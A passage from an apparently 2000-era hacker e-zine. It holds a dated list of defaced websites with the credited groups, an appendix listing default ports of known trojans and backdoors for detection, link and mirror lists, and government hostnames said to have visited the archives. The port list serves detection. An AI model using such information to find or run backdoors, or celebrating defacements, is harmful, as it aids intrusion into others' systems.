      [00.02.20] NT [ ]                    ConaTel Honduras (www.conatel.hn)
      [00.02.20] NT [Team Infinity]        My Track (www.mytrack.com)
      [00.02.20] Li [m0s]                  India Links (www.indialinks.co.in)
      [00.02.20] NT [Tr1pl3 S31S]          I-Kon S.A. (www.i-kon.co.za)
      [00.02.20] NT [Team Escape]          BPB Plc. (www.bpb.com)
      [00.02.20] Li [Argon]                Korea Astronomy Observatory (space21.issa.re.kr)
      [00.02.20] Li [COTDS]                Leisure World Korea (leisureworld.co.kr)
      [00.02.19] NT [Argon]                NOAA Nauticus site (www.nauticus.noaa.gov)
      [00.02.19] NT [ ]                    National Ocean Service Map Finder (mapfinder.nos.noaa.gov)
      [00.02.19] NT [confusion]            Office of the Speaker of the House (www.speaker.gov)
      [00.02.19] NT [Cheitan]              Belgian Federal Planning Bureau (www.plan.be)
      [00.02.19] NT [Delta Team]           USD 261 Haysville Schools (www.usd261.com)
      [00.02.19] Li [M3L40]                Siroflex Argentina (www.siroflex.com.ar)
      [00.02.19] NT [M3L40]                Renato Pereira Lima Me (www.ruas.com.br)
      [00.02.19] Li [m0s]                  Kitchen Grace (www.kitchengrace.com)
      [00.02.19] So [Paco-Tate]            Daily Bread Magazine (www.dbmag.com)
      [00.02.19] NT [FiFG]                 Carbocloro S.A. Industrias Quimicas (www.carbocloro.com.br)
      [00.02.19] NT [Crime Boys]           Burp Contest (www.burpcontest.com)
      [00.02.19] NT [KabraLzZ]         M   Amrica Air (www.americaair.com.br)
      [00.02.19] Li [Argon]             C  Wooree Lighting Co. (wooree.co.kr)
      [00.02.19] Li [COTDS]             C  Inje University Web Info (webinfo.inje.ac.kr)
      [00.02.19] Li [COTDS]             C  Dong-Eui University NC Lab (nclab.dongeui.ac.kr)
      [00.02.19] Li [Argon]                Inje University Math Lab (mathlab.inje.ac.kr)
      [00.02.18] Lr [h2so4 and spl1f]      San Diego Supercomputer Center WORM Server (worm.sdsc.edu)
      [00.02.18] NT [BlackKode]            Editora Evolutivo de Material Didatico (www.yupee.com.br)
      [00.02.18] Li [ ]                    WarNet (www.war-net.com)
      [00.02.18] NT [Team Echo]            Park Cities Dental (www.parkcitiesdental.com)
      [00.02.18] NT [Cyber Fuckers]        Italian National Institute of Healt (www.iss.it)
      [00.02.18] Lr [naptime and rich]     ISP.Com (www.isp.com)
      [00.02.18] Lr [Crime Boys]       M   Ricardo Dreves' Web site (www.dreves.com.br)
      [00.02.18] Bf [LLT]                  AudioSeek (www.audioseek.com)
      [00.02.18] Li [ ]                    JoyClick TWIS (twis.joyclick.net)
      [00.02.18] Li [ ]                 C  Seoul National University Seorak Server (seorak.snu.ac.kr)
      [00.02.18] Li [ ]                    ThruNet IP Server (s210-219-190-139.thrunet.ne.kr)
      [00.02.18] Lr [ ]                    ThruNet (s210-219-159-31.thrunet.ne.kr)
      [00.02.18] Li [ ]                 C  Seoul National University (maum.snu.ac.kr)
      [00.02.18] Lr [ ]                    Booktopia Mail Server (mail.booktopia.com)
      [00.02.17] NT [ ]                    Methuen Public Schools (www.methuen.k12.ma.us)
      [00.02.17] So [complex]              JOIN Systems (www.join.com)
      [00.02.17] So [Team Echo]        M   Best Buy Computer Shop (bestbuyshop.com.br)
      [00.02.17] NT [Artech]               USD 261 Haysville Schools (www.usd261.com)
      [00.02.17] NT [BlazinWeed]           Surface Mount Conference and Exhibition (www.surfacemount.com)
      [00.02.17] NT [OA]                   Steinberg Cellars (www.steinbergcellars.co.nz)
      [00.02.17] NT [ ]                    Paul Bunyan Days (www.paulbunyandays.com)
      [00.02.16] NT [BlazinWeed]           California State Assembly (www.assembly.ca.gov)
      [00.02.16] Bf [Cyrus the Virus]      UCH 2K (www.uch2k.org)
      [00.02.16] So [TREATY]               Power IR (www.powerir.com)
      [00.02.16] NT [Team Echo]            HUD Housing Counseling Clearinghouse (www.hudhcc.org)
      [00.02.16] NT [KabraLzZ]             Ciudad de Portiva (www.ciudaddeportiva.org)
      [00.02.16] NT [BlazinWeed]           UK Charity Commission (www.charity-commission.gov.uk)
      [00.02.16] Bf [Cuzz]                 Barkley Anderson's Web site (www.barkley.org)
      [00.02.16] NT [BlazinWeed]           Data Systems Integrators, Inc. (websvr.ewol.com)
      [00.02.16] So [BlackMan]             Kumoh National University of Technology (knut.kumoh.ac.kr)
      [00.02.16] NT [BlazinWeed]           NetManage eSolutions (esolutions.netmanage.com)
      [00.02.15] So [Team Echo]            ShadowScape Technologies (www.shadowscape.com)
      [00.02.15] NT [deface]               Rollinsford Grade School (www.rollinsford.k12.nh.us)
      [00.02.15] NT [BlazinWeed]           DeLaSalle Education Center (www.delasallecenter.org)
      [00.02.15] NT [c0rvus]               Axis Sinimbu Logistica Automotiva Ltda (www.asl.com.br)
      [00.02.15] NT [Artech]               Dept of Transportation Office of the CIO (cio.ost.dot.gov)
      [00.02.15] NT [Artech]               DOT Transportation Administrative Services Center (isweb.tasc.dot.gov)
      [00.02.15] NT [Artech]               Innov8 At Work, Office of the Secretary of Transportation (innov8atwork.ost.dot.gov)
      [00.02.15] NT [Artech]               Dept. of Transportation Y2K Web site (y2ktransport.ost.dot.gov)
      [00.02.15] Li [TheP|nkPanthe|2]      Buy 4 Fun (www.buy4fun.com)
      [00.02.15] Li [metacom]              Hex Hackers (www.hexhackers.com)
      [00.02.14] NT [Cyber Fuckers]     C  Pedo Watch (www.pedowatch.org)
      [00.02.14] NT [Team Escape]      M   TM Guide (www.tmguide.com)
      [00.02.14] So [Team Echo]            Timber Jay (www.timberjay.com)
      [00.02.14] Bf [Sabu]                 G-X (www.g-x.net)
      [00.02.14] Li [dj kensu]             ejeet.org (www.ejeet.org)
      [00.02.14] NT [Scrippie]         M   Stichting Isolatie Nederlandse Industrie (www.cini.org.uk)
      [00.02.14] NT [alt3kx]               UVC Argentina (www.uvc.com.ar)
      [00.02.13] NT [Cyber Fuckers]        Gobierno del Estado de Chiapas (www.chiapas.gob.mx)
      [00.02.13] NT [Team Echo]            Cuban Instituto de Meteorologa (www.met.inf.cu)
      [00.02.13] NT [Team Echo]            H. Lavity Stoutt Community College, British Virgin Islands (www.hlscc.edu.vg)
      [00.02.13] NT [Cyber Fuckers]        United Nations Education, Scientific, and Cultural Organization (www.unesco.org.br)
      [00.02.13] NT [Team Echo]        M   CompuNet Israel (www.compunet.co.il)
      [00.02.13] NT [Team Echo]            Trak (www.trak.co.il)
      [00.02.13] NT [Team Echo]            Take Toro (www.take-toro.co.il)
      [00.02.13] NT [Team Echo]            Tagro (www.tagro.co.il)
      [00.02.13] NT [Team Echo]            Super Mass (www.supermass.co.il)
      [00.02.13] NT [Team Echo]            Promo (www.promo.co.il)
      [00.02.13] NT [Team Echo]            MidiCom (www.midicom.co.il)
      [00.02.13] NT [Team Echo]            MegaByte (www.mega-byte.co.il)
      [00.02.13] NT [Team Echo]            Dotan (www.m-dotan.co.il)
      [00.02.13] NT [Team Echo]            Hagay Motorcycles (www.hagay-motorcycles.co.il)
      [00.02.13] NT [Team Echo]            Guiding Service (www.guidingservice.co.il)
      [00.02.13] NT [Team Echo]            Bet N Chat (www.betnchat.co.il)
      [00.02.13] So [Dor]                  SiliconNet Technologies Sdn.Bhd. (www.snt.com.my)
      [00.02.13] Bf [Tek]                  PMT Africa (www.pmtafrica.co.za)
      [00.02.13] Li [kingstr0ke]           Planet HQ (www.planethq.com)
      [00.02.13] NT [Team Echo]            Manchester Area Chamber of Commerce (www.manchester-tn.com)
      [00.02.13] NT [Crime Boys]           LG Electronics Software Development Center (www.lgsi.co.in)
      [00.02.13] So [kryptek]              E-Classified, Inc. (www.e-class.com)
      [00.02.13] Li [-X-]                  Cr4sh.Net (www.cr4sh.net)
      [00.02.13] Bf [Sabu]                 Artzy (www.artzy.com)
      [00.02.13] Li [kingstr0ke]           Warez Your PC (warezyourpc.com)
      [00.02.13] NT [RAT]                  HSR Hoschule Rapperswil (cn-pc30.hsr.ch)
      [00.02.12] Lr [Coolio]               RSA Security Inc. (www.rsa.com)
      [00.02.12] NT [Cyber Fuckers]        Reuters Sweden (www.reuters.se)
      [00.02.12] So [Cyber Fuckers]        Secretaria de Relaciones Exteriores (www.sre.gob.mx)
      [00.02.12] NT [Crime Boys]           Teleplus Tecnologia Eletro Eletronica Ltda (www.teleplus.com.br)
      [00.02.12] NT [ ]                    Lammy Industrial Madeireira da Amazonia Ltda (www.lammy.com.br)
      [00.02.12] NT [Team Echo]            Independant Insurance Agents of America (www.iiaa.org)
      [00.02.12] NT [Crime Boys]           FOB Asset Management E Corretora De Seguros (www.fob.com.br)
      [00.02.12] NT [Carte Blanche]        E2 Consultants (www.e2.com)
      [00.02.12] BI [d0ze]                 CRC Enterprises (www.crcamp.com)
      [00.02.12] Lr [lazy hackers]         Prevent Child Abuse Kentucky (pcak.net)
      [00.02.11] NT [DHC]                  WABN 92.7 (www.wabn.com)
      [00.02.11] NT [DHC]                  Vol Business (www.vol-business.net)
      [00.02.11] NT [RAT]              M   Utah Access (www.utahaccess.com)
      [00.02.11] NT [Team Echo]            Boy Scout Troop 35, Highland Park, Texas (www.troop35.org)
      [00.02.11] NT [ ]                    Boy Scout Troop 10, Honeoye Falls, NY (www.troop10.org)
      [00.02.11] Bo [ ]                    Triology (www.triology.net)
      [00.02.11] NT [pimp]                 Business Consulting Solutions, Inc. (www.tips.com)
      [00.02.11] NT [Team Echo]            Stichting Seniorweb (www.seniorweb.nl)
      [00.02.11] NT [DHC]                  Quantum Dentistry (www.quantumdentistry.com)
      [00.02.11] NT [i s]                  National Registered Agents, Inc (www.nrai.com)
      [00.02.11] NT [DHC]                  National Business College (www.nationalbusiness.edu)
      [00.02.11] NT [DHC]                  Mountain Sports Ltd. (www.mountainsportsltd.com)
      [00.02.11] So [kryptek]              Interlinea 2000 (www.i2000.es)
      [00.02.11] NT [Saint]                Hatfield Christian Church (www.hatfield.co.za)
      [00.02.11] NT [DHC]                  Gene Cochran's site (www.genecochran.com)
      [00.02.11] NT [DHC]                  FSB Dongola (www.fsbdongola.com)
      [00.02.11] Li [DLX]               C  Entertain Eon (www.entertaineon.com)
      [00.02.11] NT [KabraLzZ]             Labin4 Laboratorio de Informatica (www.encontrefacil.com.br)
      [00.02.11] Bf [Sabu]                 Cover Connection (www.coverconnection.com)
      [00.02.11] NT [DHC]                  Barker Realty (www.barker-realty.com)
      [00.02.11] NT [DHC]                  Applied Logical Methods (www.aplomet.com)
      [00.02.11] Lr [X-Gh0sT]              Medianet s.r.l (netserv.mnet.it)
      [00.02.11] NT [DHC]                  Education Systems Corporation (fugazzi.educorp.edu)
      [00.02.11] Lr [Ph0bic]               PortoNet (www.portonet.pt)
      [00.02.10] NT [Mr_Min]               NASA GSFC Office of Human Resources (ohr.gsfc.nasa.gov)
      [00.02.10] Lr [ook-ook]              Who is Your Daddy (www.whoisyourdaddy.net)
      [00.02.10] NT [Team Echo]            Troop 62 (www.troop.org)
      [00.02.10] So [kidblount]            Sargon Consulting (www.gosargon.com)
      [00.02.10] Li [Death Knights]        Fundao Mineira de Educao e Cultura (www.fumec.br)
      [00.02.10] NT [Artech]               Allard Group (www.clairant.com)
      [00.02.09] So [Team Echo]            Tennessee Crime Law (www.tncrimlaw.com)
      [00.02.09] Li [Team Infinity]        l33to.com (www.l33to.com)
      [00.02.09] NT [Team Echo]            Asociacin Mundial de Radios Comunitarias (www.amarc.org)
      [00.02.09] So [Team Echo]            Newmill Trout & Deer Farm (newmilltrout.com)
      [00.02.09] NT [Mindmelt]             LA.com (ip-250.la.com)
      [00.02.09] NT [ZeroForce]            National Association of State Universities and Land-Grant Colleges (www.nasulgc.org)
      [00.02.09] Bf [sabu]             M   Unix CCTV (www.unixcctv.com)
      [00.02.08] Lr [Trent]                JP Miniskirt (www.miniskirt-jp.com)
      [00.02.08] So [Team Echo]            First Music (www.firstmusic.com)
      [00.02.07] NT [Grupo and Ka0s]       Universidad Quetzalcoatl de Irapuato (www.uqi.edu.mx)
      [00.02.07] NT [ ]                 C  Texas Mint (www.texasmint.com)
      [00.02.07] BI [KabraLzZ]             Ciudad de Santa Fe (www.santafeciudad.gov.ar)
      [00.02.07] NT [Artech]               Rupee Saver (www.rupeesaver.com)
      [00.02.07] Lr [Check0ut]             Mali Embassy in the US (www.maliembassy-usa.org)
      [00.02.07] NT [Verb0]                Panel Components Corporation (www.interpower.com)
      [00.02.07] NT [Crime Boys]           Carvalho e Fernandes Ltda (www.comercialcarvalho.com.br)
      [00.02.07] So [ ]                    Council of Conservative Citizens (www.cofcc.org)
      [00.02.07] NT [Artech]               Clairant (www.clairant.com)
      [00.02.07] NT [Artech]               Be Wear 0303 (www.bewear0303.com)
      [00.02.07] NT [AloneX]               La Banda Del Recodo (www.bandaelrecodo.com.mx)
      [00.02.07] Li [Death Knights]        Agencia Brasileira de Noticias (www.abn.com.br)
      [00.02.06] So [LA|Calif]             X Streams (www.xstreams.com)
      [00.02.06] So [LA|Calif]             Wet Jeans (www.wetjeans.com)
      [00.02.06] NT [dot-slash crew]       PKS Porzellanklinik System GmbH (www.porzellanklinik.de)
      [00.02.06] NT [c0rvus]               Planeta Latino (www.planetalatino.com)
      [00.02.06] NT [KabraLzZ]             Fundao Instituto Brasileiro e Geografia e Estatstica (www.lep.ibge.gov.br)
      [00.02.06] Lr [BlacKc0De]            University of Chile Hospital (www.hospital.uchile.cl)
      [00.02.06] NT [KabraLzZ]             Escola Agrotecnica Federal de Bambui (www.eafbambui.gov.br)
      [00.02.06] NT [Protokol]             Dupe It (www.dupeit.com)
      [00.02.06] So [kryptek]              Kyung Sung University (voronoi.kyungsung.ac.kr)
      [00.02.06] NT [suave]                Houston Advanced Research Center (koala.harc.edu)
      [00.02.06] NT [Illusions Team]  A    Mail server for the Belgium Senate (xmail.senate.be)
      [00.02.06] NT [suave]                Palm Beach County, Florida  ISS Firewall (issfire1.co.palm-beach.fl.us)
      [00.02.05] NT [Illusions Team]       Economische Hogeschool Sint-Aloysius (www.ehsal.be)
      [00.02.05] NT [Protokol]             Lawrence Research Group (www.xandria.com)
      [00.02.05] Li [ ]                    WOH Crew (www.wohcrew.com)
      [00.02.05] Bf [DHC]                  SLTD Digital Design (www.sltd.com)
      [00.02.05] Ir [Illusions Team]       Southern California Regional Occupational Center (www.scroc.com)
      [00.02.05] Li [Trent]                Nirver Radio (www.nirveradio.com)
      [00.02.05] Bf [(/)/-_]          Air & Waste Management Association (www.environmentalshop.com)
      [00.02.05] Bf [DHC]                  eKitchen News (www.ekitchennews.com)
      [00.02.05] So [ ]                    Altavista Careers (careers.altavista.com)
      [00.02.05] Li [mOs]                  Sony Entertainment Television India (www.setindia.com)
      [00.02.05] Lr [Illusions Team]  A    One True Dave (www.otd.com)
      [00.02.05] NT [ ]                    DTR Software (www.dtr-software.com)
      [00.02.05] NT [#Dorknet]             Crime Watch S.A. (www.crimewatch.co.za)
      [00.02.05] NT [ ]                    BYU Bioag Computing (venom.byu.edu)
      [00.02.05] So [kryptek]           C  Kyung Sung University (dolphin.kyungsung.ac.kr)
      [00.02.04] NT [Wild Karrde]          Westcon Inc. (www.westcon.com)
      [00.02.04] Li [NeoTek]               Tyranny.org (www.tyranny.org)
      [00.02.04] NT [Illusions Team]  A    Metris N.V. (www.metris.be)
      [00.02.04] NT [tws]                  Faith Center (www.cfaith.org)
      [00.02.04]    [Cyb3r Fuck3rs]        Instituto Nacional de Metrologia, Normalizacao e Qualidade Industrial (www.inmetro.gov.br)
      [00.02.04] Li [InSt|nCt]             SGlyne (www.sglyne.com)
      [00.02.04] NT [snow]                 Enoch (www.enoch.com)
      [00.02.04] Lr [Dor]                  Dream Shell (www.dreamshell.com)
      [00.02.04] NT [snow]                 Chord Board (www.chordboard.com)
      [00.02.03] NT [confusion]            Yolo County (www.yolocounty.org)
      [00.02.03] NT [confusion]            La Salle College High School (www.lschs.wyndmoor.pa.us)
      [00.02.03] Li [ph33r the b33r]       LG Enterprises (www.lgenterprises.threadnet.com)
      [00.02.03] NT [akt0r]                ImagiNet S.A. (www.imaginet.co.za)
      [00.02.03] NT [Crime Boys]           Communications Projects and Computing (www.compcom.com.au)
      [00.02.03] NT [Team Echo]            Crawford Communications, Inc (www.centralindiana.com)
      [00.02.03] NT [confusion]            Ocean County, New Jersey (webhost.co.ocean.nj.us)
      [00.02.03] NT [confusion]            Culver City, California Name Server (ns1.culver-city.ca.us)
      [00.02.03] NT [confusion]            North Carolina, Moore County Web site (mccs.co.moore.nc.us)
      [00.02.02] NT [VSO Inc.]             Companhia De Informatica Do Parana - Celepar (www.tcefl.pr.gov.br)
      [00.02.02] NT [Tr1pl3 S31S]          Roderick & Martin, Professional Auctioneers (www.rodmar.co.za)
      [00.02.02] Li [SoiraM]               Partizan Football Club, Belgrade (www.partizan.co.yu)
      [00.02.02] NT [protokol]             Madera County School District (www.maderacoe.k12.ca.us)
      [00.02.02] NT [KabraLzZ]             Colombia Departamento Nacional de Planificacin (www.dnp.gov.co)
      [00.02.02] Lr [ner0tec]              Keene State College CS Department (www.csdept.keene.edu)
      [00.02.02] NT [The Killer]           Corporacin Autnoma Regional de Cundinamarca (www.car.gov.co)
      [00.02.02] NT [ViPER]                Azlan (www.azlan.nl)
      [00.02.01] Lr [synk]                 Kyung Sung Sea&Air Co., Ltd. (kssna.com)
      [00.02.01] 31 [ ]                    Dark Harbingers (www.darkharbingers.com)
      [00.02.01] Li [p4r4g0n3]             Fantex (www.fantex.com)
      [00.02.01] NT [Crime Boys]           JVC Info (www.jvcinfo.com)
      [00.02.01] NT [The Killer]           Romanian Ministry of Research and Technology (www.mct.ro)
      [00.02.01] NT [TWS]                  South Christian High School (www.schs.org)
      [00.02.01] So [fsk]               C  Japanese Institute of Space and Astronautical Science, VLBI Space Observatory Programme (www.vsop.isas.ac.jp)

      
       
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
      By: joakim.von.braun@risab.se 
      Source: PSS
       
      Common Trojan ports to watch for:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      After seeing several questions about traffic directed at ports as 31337 and
      12345 I've put together a list of all trojans known to me and the default
      ports they are using. Of course several of them could use any port, but I
      hope this list will maybe give you a clue of what might be going on.
      
      port       21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx,
                          WinCrash
      port       23 - Tiny Telnet Server
      port       25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz
                          Stealth, Terminator, WinPC, WinSpy
      port       31 - Hackers Paradise
      port       80 - Executor
      port     456 - Hackers Paradise
      port     555 - Ini-Killer, Phase Zero, Stealth Spy
      port     666 - Satanz Backdoor
      port   1001 - Silencer, WebEx
      port   1011 - Doly Trojan
      port   1170 - Psyber Stream Server, Voice
      port   1234 - Ultors Trojan
      port   1245 - VooDoo Doll
      port   1492 - FTP99CMP
      port   1600 - Shivka-Burka
      port   1807 - SpySender
      port   1981 - Shockrave
      port   1999 - BackDoor
      port   2001 - Trojan Cow
      port   2023 - Ripper
      port   2115 - Bugs
      port   2140 - Deep Throat, The Invasor
      port   2801 - Phineas Phucker
      port   3024 - WinCrash
      port   3129 - Masters Paradise
      port   3150 - Deep Throat, The Invasor
      port   3700 - Portal of Doom
      port   4092 - WinCrash
      port   4590 - ICQTrojan
      port   5000 - Sockets de Troie
      port   5001 - Sockets de Troie
      port   5321 - Firehotcker
      port   5400 - Blade Runner
      port   5401 - Blade Runner
      port   5402 - Blade Runner
      port   5569 - Robo-Hack
      port   5742 - WinCrash
      port   6670 - DeepThroat
      port   6771 - DeepThroat
      port   6969 - GateCrasher, Priority
      port   7000 - Remote Grab
      port   7300 - NetMonitor
      port   7301 - NetMonitor
      port   7306 - NetMonitor
      port   7307 - NetMonitor
      port   7308 - NetMonitor
      port   7789 - ICKiller
      port   9872 - Portal of Doom
      port   9873 - Portal of Doom
      port   9874 - Portal of Doom
      port   9875 - Portal of Doom
      port   9989 - iNi-Killer
      port 10067 - Portal of Doom
      port 10167 - Portal of Doom
      port 11000 - Senna Spy
      port 11223 - Progenic trojan
      port 12223 - Hack99 KeyLogger
      port 12345 - GabanBus, NetBus
      port 12346 - GabanBus, NetBus
      port 12361 - Whack-a-mole
      port 12362 - Whack-a-mole
      port 16969 - Priority
      port 20001 - Millennium
      port 20034 - NetBus 2 Pro
      port 21544 - GirlFriend
      port 22222 - Prosiak
      port 23456 - Evil FTP, Ugly FTP
      port 26274 - Delta
      port 31337 - Back Orifice
      port 31338 - Back Orifice, DeepBO
      port 31339 - NetSpy DK
      port 31666 - BOWhack
      port 33333 - Prosiak
      port 34324 - BigGluck, TN
      port 40412 - The Spy
      port 40421 - Masters Paradise
      port 40422 - Masters Paradise
      port 40423 - Masters Paradise
      port 40426 - Masters Paradise
      port 47262 - Delta
      port 50505 - Sockets de Troie
      port 50766 - Fore
      port 53001 - Remote Windows Shutdown
      port 61466 - Telecommando
      port 65000 - Devil
      
      You'll find the list on the following address:
      http://www.simovits.com/nyheter9902.html  (still in Swedish but it will be
      translated in the near future).
      
      To help anyone to detect trojan attacks, Im planning to add information
      about the original names of the executables, their size, where they usually
      are hiding, and the names of any helpfiles they may use. I will also add
      tools or links to tools that may be of your assistance.
      
      Feel free to get back to me with any comments or suggestions. If you find
      new trojans Ill love to get my hands on them, but please mail me first, as
      I dont need more than one copy. If you have live experiance of trojan
      attacks Im interested to read about your findings.
      
      Joakim
      
      joakim.von.braun@risab.se


  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*

              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      Croatia.......: http://security.monitor.hr
      
      Colombia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net                                   
                      
      Finland ........http://hackunlimited.com/                
                      
      Germany ........http://www.alldas.de/
                      http://www.security-news.com/
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
      
      South Africa ...http://www.hackers.co.za       
                      http://www.hack.co.za ** BACK ONLINE AS OF FEB 22ND **           
                      
                      http://www.posthuman.za.net 
 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to cruciphux@dok.org and i'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    
A.2 Hot Hits
    ~~~~~~~~    
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
    
    
       Today the spotlight may be on you, some interesting machines that
                  have accessed these archives recently...
               
                               _   _       _
                              | | | | ___ | |_
                              | |_| |/ _ \| __|
                              |  _  | (_) | |_
                              |_| |_|\___/ \__|
                               _    _ _ _
                              | |  | (_) |
                              | |__| |_| |_ ___
                              |  __  | | __/ __|
                              | |  | | | |_\__ \
                              |_|  |_|_|\__|___/
                              
                            .gov and .mil activity
                            
                             Updated Feb 2000
                             
                             ag.ncis.navy.mil
                             obgate,hill.af.mil
                             hqs-ras-p34.ncr.disa.mil
                             proxy.san.mrms.navy.mil
                             security3.nrl.navy.mil
                             shq-ot-1178.nosc.mil
                             legion.dera.gov.uk
                             bogon.llnl.gov
                             dogpatch.llnl.gov
                             
                             fitzgerald.ags.bnl.gov
                             zephyr1.pnl.gov
                             ihvideo.lewisham.gov.uk
                             shihonage.gsfc.nasa.gov
                             burnia.dmz.health.nsw.gov.au                             
                             ococ.oc.ca.gov
                             guardian.gov.sg
                             aragorn.dpa.act.gov.au
                             ipaccess.gov.ru
                             eagle-ts222.korea.army.mil
                             gate1.noc.usmc.mil
                             eagle-ts209.korea.army.mil
                             proxy.vandenberg.af.mil
                             lax.dcmdw.dla.mil
                             beowulf.ramstein.af.mil                             
                             cofcs71.aphis.usda.gov 
                             samds4.sam.pentagon.mil
                             eg-016-045.eglin.af.mil
                             pacfa.evepier.navy.mil
                             obgate.hill.af.mil
                             biglost.inel.gov
                             marshall.state.gov
                             flatline.arc.nasa.gov
                             mars.istac.gov
                             gateway1.osd.mil
                             gateway3.osd.mil
                             elan5172.cbcph.navy.mil
                             proxy.gintic.gov.sg
                             doegate.doe.gov
                             sunspot.gsfc.nasa.gov
                             gate1.mcbh.usmc.mil 
                             homer.nawcad.navy.mil
                             maggie.nawcad.navy.mil
                             lisa.nawcad.navy.mil 
                             msproxy.transcom.mil
                             b-kahuna.hickam.af.mil
                             sc034ws109.nosc.mil
                             infosec.se
                             gate2.mcbutler.usmc.mil
                             sc034ws109.nosc.mil
                             shq-ot-1178.nosc.mil
                             dhcp-036190.scott.af.mil
                             mcreed.lan.teale.ca.gov
                             dodo.nist.gov
                             mc1926.mcclellan.af.mil
                             kwai11.nsf.gov
                             enduser.faa.gov
                             vasfw02,fdic.gov 
                             lisa.defcen.gov.au
                             ps1.pbgc.gov
                             guardian.gov.sg
                             amccss229116.scott.af.mil
                             sc022ws224.nosc.mil
                             sheppard2.hurlburt.af.mil                             
                             marshall.us-state.gov
                             digger1.defence.gov.au
                             firewall.mendoza.gov.ar
                             ipaccess.gov.ru
                             gatekeeper.itsec-debis.de
                             fgoscs.itsec-debis.de
                             fhu-ed4ccdf.fhu.disa.mil
                             citspr.tyndall.af.mil
                             kelsatx2.kelly.af.mil
                             kane.sheppard.af.mil                             
                             relay5.nima.mil
                             host.198-76-34-33.gsa.gov
                             ntsrvr.vsw.navy.mil
                             saic2.nosc.mil
                             wygate.wy.blm.gov
                             mrwilson.lanl.gov
                             p722ar.npt.nuwc.navy.mil
                             ws088228.ramstein.af.mil
                             car-gw.defence.gov.au
                             unknown-c-23-147.latimes.com
                             nytgate1.nytimes.com
                             
                             
    There are some interesting machines among these, the *.nosc.mil boxes are
    from SPAWAR information warfare centres, good Is It Worth It Followup to see
    our boys keeping up with the news... - Ed                             
  
    @HWA


A.3 Mirror Sites List
    ~~~~~~~~~~~~~~~~~
    
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=                       
  
                       __  __ _
                      |  \/  (_)_ __ _ __ ___  _ __ ___
                      | |\/| | | '__| '__/ _ \| '__/ __|
                      | |  | | | |  | | | (_) | |  \__ \
                      |_|  |_|_|_|  |_|  \___/|_|  |___/
                      
                      
                      
   Some of these are not keeping up with new issues like they should be, you
   can always get the latest issue from www.csoft.net/~hwa or join us on IRC
   (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux
   where the latest issues may be attained. I also upload all issues to 
   etext.org, the zines are available thru their ftp service, updates are slow.
   - Ed                 

                       


     New mirror sites
               
  ***   http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp   *** NEW *** 
  ***   http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***      
        http://datatwirl.intranova.net * NEW * 
        http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
        http://net-security.org/hwahaxornews     
        http://www.attrition.org/hosted/hwa/
        http://hwazine.cjb.net/   
        http://www.hackunlimited.com/files/secu/papers/hwa/
        http://www.attrition.org/~modify/texts/zines/HWA/                                
      * http://hwa.hax0r.news.8m.com/           
      * http://www.fortunecity.com/skyscraper/feature/103/  
               
      * Crappy free sites of no use to anyone. too lazy to kill em.      
     
                
    *** Most likely to be up to date other than the main site.    
                        
                        
     
     HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
     thanks to airportman for the Cubesoft bandwidth. Also shouts out to all 
